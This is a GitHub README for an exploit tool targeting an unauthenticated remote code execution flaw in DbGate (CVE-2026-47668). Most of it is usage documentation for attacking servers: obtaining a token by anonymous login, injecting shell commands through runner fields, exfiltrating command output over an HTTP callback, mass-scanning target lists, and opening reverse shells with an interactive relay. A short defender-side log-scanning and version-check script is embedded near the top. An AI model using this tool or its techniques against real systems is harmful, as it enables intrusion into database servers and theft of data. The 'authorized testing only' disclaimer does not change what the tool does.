GitHub: Nxploited/CVE-2026-47668
# CVE-2026-47668 — DbGate Remote Code Execution
**Unauthenticated RCE in DbGate JSON Script Runner (`dbgate-serve` ≤ 7.1.8).**
Assessment tool: **`CVE-2026-47668.py`** — authorized testing only.
| Field | Value |
|---|---|
| **CVE** | CVE-2026-47668 |
| **Severity** | Critical |
| **Product** | DbGate / `dbgate-serve` |
| **Affected** | ≤ **7.1.8** |
| **Fixed** | ≥ **7.1.9** |
| **CVSS 3.1** | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| **CWE** | CWE-20, CWE-94, CWE-1188 |
## Vulnerability
**Title:** DbGate Unauthenticated Remote Code Execution via JSON Script Runner
User-controlled fields (`functionName`, `variableName`) are embedded in dynamically generated JavaScript without proper validation. An attacker can execute arbitrary code in the Node.js runner child process.
| Item | Detail |
|------|--------|
| **Endpoint** | `POST /runners/start` |
| **Auth** | Bearer required; token may be obtained via `POST /auth/login` on anonymous/default deployments |
| **Injection** | `functionName`, `variableName` in JSON `assign` commands |
| **Impact** | OS command execution as the DbGate process user |
**Mitigation:** Upgrade to **7.1.9+**. Restrict network access, disable anonymous auth, rotate credentials, review logs for suspicious `/runners/start` activity.
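A defender-side check for the mitigation steps above, added here as an example and not part of the tool or of DbGate: it scans reverse-proxy access log lines (Common Log Format is assumed; the sample lines are constructed) for `POST /runners/start` calls, counts them per source address, and compares an installed `dbgate-serve` version against the affected range the advisory states (≤ 7.1.8).

```python
import re
from collections import Counter

# Affected range from the advisory: dbgate-serve <= 7.1.8, fixed in >= 7.1.9.
AFFECTED_MAX = (7, 1, 8)

def parse_version(v: str) -> tuple:
    """'7.1.8', 'v7.1.8' or '7.1.9-beta.1' -> (major, minor, patch); pre-release suffix ignored."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    return tuple(int(x) for x in m.groups())

def is_affected(version: str) -> bool:
    """True when the installed dbgate-serve version falls inside the advisory's affected range."""
    return parse_version(version) <= AFFECTED_MAX

# Common Log Format (assumed proxy log layout): ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_runner_starts(lines):
    """Return (ip, timestamp, status) for every POST to /runners/start; query strings are ignored."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if m.group("method") == "POST" and path == "/runners/start":
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits

def callers(hits) -> Counter:
    """Count /runners/start calls per source IP; a burst from one unexpected address is what to triage."""
    return Counter(ip for ip, _, _ in hits)

# Constructed sample log: a login followed by two runner starts from one address, plus other traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2026:10:00:01 +0000] "POST /auth/login HTTP/1.1" 200 153',
    '203.0.113.7 - - [01/May/2026:10:00:02 +0000] "POST /runners/start HTTP/1.1" 200 87',
    '203.0.113.7 - - [01/May/2026:10:00:03 +0000] "POST /runners/start HTTP/1.1" 200 87',
    '10.0.0.5 - - [01/May/2026:10:01:00 +0000] "GET /runners/start HTTP/1.1" 404 0',
    '10.0.0.5 - - [01/May/2026:10:02:00 +0000] "POST /runners/start?x=1 HTTP/1.1" 200 87',
    'not a log line at all',
]

if __name__ == "__main__":
    for ip, n in callers(find_runner_starts(SAMPLE_LOG)).items():
        print(f"{ip}: {n} x POST /runners/start")
    print("7.1.8 affected:", is_affected("7.1.8"), "| 7.1.9 affected:", is_affected("7.1.9"))
```

Run it against your own proxy logs by replacing `SAMPLE_LOG` with the file's lines; any source that is not an expected DbGate client is worth correlating with the preceding `POST /auth/login`.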
## Contact
**Telegram:** [@KNxploited](https://t.me/KNxploited)
## Tool Overview
**`CVE-2026-47668.py`** checks and validates exploitation against DbGate instances you are **authorized** to test.
**Modes**
| Mode | Reverse shell | Description |
|------|---------------|-------------|
| **AUTO** | No | One prompt; token + HTTP callback + defaults |
| **CLI** | Optional | Full control via flags |
| **Mass** | No | Scan from `targets.txt` |
| **`--reverse-shell`** | Yes | Optional TCP verify (single target only) |
**Results**
| Result | Meaning |
|--------|---------|
| **FAIL** | Unreachable, auth failed, or not vulnerable |
| **VULN** | Runner accepted probe only |
| **DISPATCH** | Payload sent; **no** confirmed output |
| **EXFIL** | Callback received — **confirmed command output** |
| **REVSH** | Reverse TCP connected (optional mode only) |
**Output directory:** `Nx/` (vuln, dispatch, exfil, failed, list_report, per-target files under `exfil/`)
## Install
```bash
pip install -r requirements.txt
```
**Requires:** Python 3.9+, `aiohttp`, `colorama`
## Usage
### AUTO wizard (default — no reverse shell)
```bash
python CVE-2026-47668.py
```
| Input at prompt | Example |
|-----------------|--------|
| Single URL | `http://192.168.1.10:3000` |
| URL + command | `http://192.168.1.10:3000\|id` |
| Target list | `targets.txt` |
### CLI — enable flag
Every CLI run **must** include **`--cli`**.
```bash
python CVE-2026-47668.py --cli [options]
```
### Single target
**`-u` / `--url`** — target base URL
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000
```
**`--cmd` / `--command`** — shell command (default: `id`)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"
```
**`--check-only`** — vulnerability probe only (no command)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only
```
**`--vector`** — injection vector: `functionName` \| `variableName` \| `both`
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id
```
**`--port`** — default port when URL has no port (default: **3000**)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id
```
**`--token`** — use existing Bearer token
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id
```
**`--login-json`** — custom login body (default: `{"amoid":"none"}`)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id
```
**`--timeout`** — HTTP timeout in seconds
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id
```
**`--secure`** — verify TLS certificates
```bash
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id
```
### Callback / exfil (default in CLI with `--cmd`)
**`--callback-host`** — IP/hostname the **target** uses to reach your listener
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id
```
**`--listen-host`** — local bind for HTTP listener (default: `0.0.0.0`)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id
```
**`--listen-port`** — HTTP exfil port (default: **8888**)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id
```
**`-c` / `--callback`** — external callback URL (disables built-in listener)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id
```
**`--wait-exfil`** — seconds to wait for callback (single target, default: **8**)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id
```
**`--no-b64`** — send output without base64 encoding
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id
```
**`--async-exec`** — async `exec` instead of `execSync`
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id
```
### Mass scan (no reverse shell)
**`-f` / `--file`** — target list file
```bash
python CVE-2026-47668.py --cli -f targets.txt --cmd id
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50
```
**`--mass-wait-exfil`** — callback wait per target in mass (default: **8**)
```bash
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12
```
**Mass + custom default port**
```bash
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"
```
### Reverse shell (optional — single target only)
**Not required** for normal testing. Use **HTTP exfil** (`--cmd`) for proof.
**`--reverse-shell`** — target connects to `LHOST:LPORT` (omit value = LAN IP + port **4444**)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444
```
**`--revsh-port`** — port when `--reverse-shell` has no `:port`
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444
```
**`--revsh-bind`** — local listen address
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0
```
**`--wait-revsh`** — wait for TCP (default: **15**)
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20
```
**`--revsh-interactive`** — basic stdin/stdout relay after connect
```bash
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive
```
**Docker note:** use an IP reachable **from the DbGate container** (e.g. host gateway), not `127.0.0.1` on your PC only.
## Target list (`targets.txt`)
```text
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
```
- **No port** → **3000** applied automatically
- **`host|command`** → per-line command override
- Report: **`Nx/list_report.txt`**
## Output files
| File | Content |
|------|---------|
| `Nx/vuln.txt` | Vulnerable targets (probe OK) |
| `Nx/dispatch.txt` | Payload sent, unconfirmed |
| `Nx/exfil.txt` | Confirmed callbacks |
| `Nx/failed.txt` | Failed targets |
| `Nx/exfil/.txt` | Command output per target |
| `Nx/sessions//summary.json` | Session summary |
## Workflow
1. **`POST /auth/login`** → Bearer token (automatic unless `--token`)
2. **Probe** → runner accepts injection
3. **`POST /runners/start`** → run command + HTTP callback (or reverse TCP if enabled)
4. Classify → **EXFIL** = confirmed output
## Disclaimer
For **authorized security testing only**. You must have explicit permission to test any system. The author is not responsible for misuse or illegal use.
**By: Nxploited**